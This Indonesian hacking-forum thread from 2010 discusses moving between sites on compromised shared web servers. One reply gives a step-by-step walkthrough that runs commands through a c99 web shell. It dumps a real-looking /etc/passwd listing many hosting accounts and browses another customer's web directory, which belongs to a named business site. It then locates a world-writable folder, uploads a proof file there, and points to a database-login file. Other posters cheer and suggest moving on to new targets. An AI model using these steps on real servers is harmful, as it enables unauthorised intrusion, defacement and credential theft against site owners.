Jumping di server windows

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Post Reply
User avatar
anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Jumping di server windows

Post by anharku » Thu Aug 05, 2010 11:57 am

hemm..informasi nigh, aku bagi disini yagh sapa tahu ada yg belum tahu tentang jumping di server windows :circle:
Image
dari yang aku pelajari , kalau dapet server windows lalu di bagian directory /rootnya ada tulisan domains, atau wwwroot nagh kaya gitu biasanya daftar domain yg bisa di jumping banyak tuh... tp juga tergantung keberuntungan hak akses juga sih hehehe,,,, :devil
kalau dagh dapet kek gitu mau diapain hayooo???? seragh deh mau diapan tangung sendiri dosa2nya :devil

salam
anharku
Top
User avatar
abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../
Contact:
Contact abit doang

Re: Jumping di server windows

Post by abit doang » Thu Aug 05, 2010 1:26 pm

hihi,..
klo windos emang lebih enak liat2 file atau dir nya..
liat semua Drive & dir nya siapa tau ada file2 luchu,.. :P
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/
Top
User avatar
Xshadow
Posts: 482
Joined: Thu May 31, 2007 8:01 pm
Location: http://captureflags.com
Contact:
Contact Xshadow

Re: Jumping di server windows

Post by Xshadow » Thu Aug 05, 2010 9:42 pm

gak windows gak linux... paling gampang ya dibaca dulu httpd.conf-nya
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare
Top
User avatar
anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: Jumping di server windows

Post by anharku » Fri Aug 06, 2010 10:10 am

Xshadow wrote:gak windows gak linux... paling gampang ya dibaca dulu httpd.conf-nya
hem... makasih KK atas masukannya :kaca:
Top
User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:
Contact 3xtr3m3b0y

Re: Jumping di server windows

Post by 3xtr3m3b0y » Sat Aug 07, 2010 4:25 pm

Lebih gampang lg tinggal UP..UP..UP doank Om
...n0 l1m17...
Top
User avatar
abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../
Contact:
Contact abit doang

Re: Jumping di server windows

Post by abit doang » Sat Aug 07, 2010 5:50 pm

klo model shell ku ini gimana..??
udah mati kutu kayaknya ...
permision 755, kagak ada file penting pula,..
mo UP juga gak bisa,..
atau masih bisa digoyang.???

Code: Select all

http://mau-tau-aja.lu/apaajaboleh/INF0.php
nb : file d aplod via FTP, hasil nemu di web saudaranya..
nb2 : shell (link) location, hide by me,..
nb3 : klo mao tau lokasinya, please PM me..
:tapa: :maaf: :devil :malumalu: :circle:
Last edited by abit doang on Sun Aug 08, 2010 7:51 pm, edited 3 times in total.
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/
Top
User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:
Contact 3xtr3m3b0y

Re: Jumping di server windows

Post by 3xtr3m3b0y » Sun Aug 08, 2010 8:33 am

abit doang wrote:klo model shell ku ini gimana..??
udah mati kutu kayaknya ...
permision 755, kagak ada file penting pula,..
mo UP juga gak bisa,..
atau masih bisa digoyang.???
Masih sangat bisa koq Om:
Modal kita saat ini:
Webshell: c99
Path Web Direktori: /home/<user>/public_html

Dari kedua modal di atas kita bisa mencari informasi lokasi yg bisa ditulisi maupun mencari info login ke database, berikut langkah2 yg bisa sy lakukan:

1. Lihat isi /etc/passwd
ketikkan ini pada Bag. Command Execution:
cat /etc/passwd
Selanjutnya akan ditampilkan daftar user yg ada pada sistem.

Code: Select all

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
loansnow:x:512:512::/home/loansnow:/bin/bash
jk:x:32007:32009::/home/jk:/bin/bash
murrland:x:513:513::/home/murrland:/bin/bash
murrclas:x:514:514::/home/murrclas:/bin/bash
wwwinre:x:515:515::/home/wwwinre:/bin/bash
wwwcoor:x:516:516::/home/wwwcoor:/bin/bash
magpie:x:517:517::/home/magpie:/bin/bash
wwwbbc:x:518:518::/home/wwwbbc:/bin/bash
wwwtaa:x:519:519::/home/wwwtaa:/bin/bash
wwwremfi:x:520:520::/home/wwwremfi:/bin/bash
murrcom:x:521:521::/home/murrcom:/bin/bash
wwwclic:x:522:522::/home/wwwclic:/bin/bash
wwwsesa:x:523:523::/home/wwwsesa:/bin/bash
wwwscsa:x:524:524::/home/wwwscsa:/bin/bash
wwwbb:x:525:525::/home/wwwbb:/bin/bash
wwwbv:x:526:526::/home/wwwbv:/bin/bash
westate:x:528:528::/home/westate:/usr/local/cpanel/bin/jailshell
djautos:x:529:529::/home/djautos:/usr/local/cpanel/bin/jailshell
raptchau:x:530:530::/home/raptchau:/bin/bash
wwwweb:x:531:531::/home/wwwweb:/bin/bash
supasorb:x:532:532::/home/supasorb:/bin/bash
yoshiki:x:533:533::/home/yoshiki:/bin/bash
bcampers:x:534:534::/home/bcampers:/bin/bash
wwwposi:x:535:535::/home/wwwposi:/usr/local/cpanel/bin/noshell
wwwbsre:x:536:536::/home/wwwbsre:/usr/local/cpanel/bin/noshell
wwwmjf:x:537:537::/home/wwwmjf:/bin/bash
wwwblue:x:538:538::/home/wwwblue:/usr/local/cpanel/bin/noshell
wwwace4:x:539:539::/home/wwwace4:/usr/local/cpanel/bin/noshell
wwwaloa:x:540:540::/home/wwwaloa:/usr/local/cpanel/bin/noshell
wwwmorg:x:541:541::/home/wwwmorg:/usr/local/cpanel/bin/noshell
wwwfair:x:542:542::/home/wwwfair:/usr/local/cpanel/bin/noshell
themurrl:x:543:543::/home/themurrl:/bin/bash
wwwrich:x:544:544::/home/wwwrich:/bin/bash
raok:x:545:545::/home/raok:/usr/local/cpanel/bin/noshell
wwwstyl:x:546:546::/home/wwwstyl:/usr/local/cpanel/bin/noshell
wwwsama:x:547:547::/home/wwwsama:/usr/local/cpanel/bin/noshell
wwwwater:x:548:548::/home/wwwwater:/bin/bash
wwwmill:x:549:549::/home/wwwmill:/bin/bash
wwwbcam:x:550:550::/home/wwwbcam:/bin/bash
hillssa:x:551:551::/home/hillssa:/bin/bash
wwwaldi:x:552:552::/home/wwwaldi:/bin/bash
propoly:x:553:553::/home/propoly:/bin/bash
mwl33577:x:554:554::/home/mwl33577:/usr/local/cpanel/bin/jailshell
wwwcindy:x:555:555::/home/wwwcindy:/bin/bash
wwwharr:x:556:556::/home/wwwharr:/bin/bash
wwwsaski:x:557:557::/home/wwwsaski:/bin/bash
hartmann:x:558:558::/home/hartmann:/bin/bash
miniminy:x:559:559::/home/miniminy:/bin/bash
wwwurban:x:560:560::/home/wwwurban:/bin/bash
ehmpcg:x:561:561::/home/ehmpcg:/bin/bash
wwwincon:x:562:562::/home/wwwincon:/bin/bash
wwwgecr:x:563:563::/home/wwwgecr:/bin/bash
wwwholb:x:564:564::/home/wwwholb:/bin/bash
murray:x:565:565::/home/murray:/usr/local/cpanel/bin/jailshell
masonsre:x:566:566::/home/masonsre:/usr/local/cpanel/bin/jailshell
wwwdogs:x:567:567::/home/wwwdogs:/bin/bash
mbbook:x:568:568::/home/mbbook:/bin/bash
blondies:x:569:569::/home/blondies:/bin/bash
wwwmach:x:570:570::/home/wwwmach:/bin/bash
polarpri:x:571:571::/home/polarpri:/usr/local/cpanel/bin/noshell
polardis:x:573:573::/home/polardis:/bin/bash
mclascom:x:503:500::/home/mclascom:/bin/bash
polar2:x:504:501::/home/polar2:/bin/bash
wwwcool:x:505:502::/home/wwwcool:/bin/bash
murraybr:x:506:503::/home/murraybr:/bin/bash
mbmotel:x:507:504::/home/mbmotel:/bin/bash
wwwridl:x:508:505::/home/wwwridl:/bin/bash
spirit09:x:509:506::/home/spirit09:/bin/bash
mbunited:x:574:507::/home/mbunited:/bin/bash
aungerre:x:575:508::/home/aungerre:/bin/bash
bexhaust:x:576:509::/home/bexhaust:/bin/bash
taylored:x:577:574::/home/taylored:/bin/bash
wwwzen:x:578:575::/home/wwwzen:/bin/bash
mbmerc:x:579:576::/home/mbmerc:/bin/bash
wwwroof:x:580:577::/home/wwwroof:/bin/bash
wwwopen:x:581:578::/home/wwwopen:/bin/bash
leadinge:x:582:579::/home/leadinge:/bin/bash
wwwpure:x:583:580::/home/wwwpure:/bin/bash
wwwspend:x:584:581::/home/wwwspend:/bin/bash
mbplay:x:585:582::/home/mbplay:/bin/bash
wwwlej:x:586:583::/home/wwwlej:/bin/bash
wwwtoto:x:587:584::/home/wwwtoto:/bin/bash
wwwmbweb:x:588:585::/home/wwwmbweb:/bin/bash
wwwdab:x:589:586::/home/wwwdab:/bin/bash
polar3:x:590:587::/home/polar3:/bin/bash
wwwprint:x:591:588::/home/wwwprint:/bin/bash
wwwmbmc:x:592:589::/home/wwwmbmc:/bin/bash
mbinvest:x:593:590::/home/mbinvest:/bin/bash
Target sy kali ini adalah user bernama hartmann

2. Dari info user yg telah kita dapatkan, kita bisa mencoba masuk ke lokasi webdir masing2 user.

ls -l /home/hartmann/public_html

Result:

Code: Select all

total 2072
-rw-r--r-- 1 hartmann hartmann    8327 Nov 21  2009 AC_RunActiveContent.js
drwxr-xr-x 2 hartmann hartmann    4096 Sep 25  2009 admin
drwxr-xr-x 2 hartmann hartmann    4096 Sep 10  2009 cgi-bin
-rw-r--r-- 1 hartmann hartmann   12763 Nov 23  2009 contactus.htm
drwxr-xr-x 3 hartmann hartmann    4096 Sep 24  2009 css
-rw-r--r-- 1 hartmann hartmann    7760 Sep 24  2009 gallery.htm
drwxrwxrwx 2 hartmann hartmann    4096 Mar  7 18:06 galleryimages
-rw-r--r-- 1 hartmann hartmann    9319 Nov 21  2009 gallery.php
-rw-r--r-- 1 hartmann hartmann   43815 Nov 21  2009 hartwhite.swf
-rw-r--r-- 1 hartmann hartmann   24155 Nov 23  2009 home.htm
drwxr-xr-x 3 hartmann hartmann    4096 Nov 21  2009 images
drwxr-xr-x 2 hartmann hartmann    4096 Sep 24  2009 include
-rw-r--r-- 1 hartmann hartmann    4470 Oct 27  2009 meetthestaff.htm
drwxr-xr-x 4 hartmann hartmann    4096 Sep 15  2009 _mm
drwxr-xr-x 2 hartmann hartmann    4096 Nov 23  2009 _notes
-rw-r--r-- 1 hartmann hartmann     132 Sep 15  2009 robots.txt
-rw-r--r-- 1 hartmann hartmann    6629 Nov 23  2009 services.htm
-rw-r--r-- 1 hartmann hartmann    8949 Nov 21  2009 Southcoast.htm
-rw-r--r-- 1 hartmann hartmann 1931680 Oct 23  2009 swflash.cab
3. Mencari lokasi yg bisa ditulisi:
Dari daftar file dan dir yg telah ditampilkan di atas, terdapat 1 lokasi yg bisa kita tulisi, yaitu:

drwxrwxrwx 2 hartmann hartmann 4096 Mar 7 18:06 galleryimages

Kita bisa langsung menuju ke lokasi tsb, lalu mengunggah atau membuat file milik kita.
Hasilnya:
http://hartmannplumbing.com.au/galleryi ... 3m3b0y.txt

4. Hal lain yg bisa kita lakukan adalah mencari info koneksi ke database.
Mata sy tertuju ke Direktori:
drwxr-xr-x 2 hartmann hartmann 4096 Sep 24 2009 include

Saya kemudian masuk ke lokasi tsb dan menemukan file2 menarik:

Code: Select all

total 172
-rw-r--r-- 1 hartmann hartmann   1870 Sep 24  2009 dbfunctions.inc
-rw-r--r-- 1 hartmann hartmann   4968 Sep 24  2009 functions.inc
-rw-r--r-- 1 hartmann hartmann   4014 Sep 15  2009 gallery.css
-rw-r--r-- 1 hartmann hartmann  11630 Sep 15  2009 gallery.js
-rw-r--r-- 1 hartmann hartmann 120620 Sep 15  2009 jquery.js
-rw-r--r-- 1 hartmann hartmann    106 Sep 24  2009 logins.inc
-rw-r--r-- 1 hartmann hartmann   4021 Sep 15  2009 thickbox.css
-rw-r--r-- 1 hartmann hartmann  11629 Sep 15  2009 thickbox.js
Selanjutnya sy coba buka isi file logins.inc
Hasilnya:
Cek sj sendiri ahh... :P

Ok, that's all folks
...n0 l1m17...
Top
User avatar
anharku
Posts: 248
Joined: Thu Oct 08, 2009 11:42 am

Re: Jumping di server windows

Post by anharku » Sun Aug 08, 2010 12:25 pm

makasih om 3xtr3m3b0y atas tekniknya..
nah tuh dah diajarin :circle:
coba dengan berbagai cara.. kalau emang udagh mentok ya udagh cari target lain :devil
Top
User avatar
abit doang
Posts: 212
Joined: Wed Mar 19, 2008 3:51 pm
Location: cd ../
Contact:
Contact abit doang

Re: Jumping di server windows

Post by abit doang » Sun Aug 08, 2010 7:12 pm

@ om 3xtr3m3b0y
makasih om, ilmu baru lagi nih buat ku,..
jadi intinya walaupun kita gak bisa pindah dir -> $cd
tapi ada kemungkinan buat $ls | $cat | dll..
mantaaap.....
:kaca: :tapa: :licik: :malumalu:
Yaa ALLAH, kayakanlah kami semua, agar kami dapat berbagi lebih banyak lagi :)
dan berilah kepada kami, jodoh yg terbaik dari sisiMU.
aamiin.. :D

http://abid912.wordpress.com/
http://maniak-online.blogspot.com/
Top
Post Reply

Return to “Web Hacking”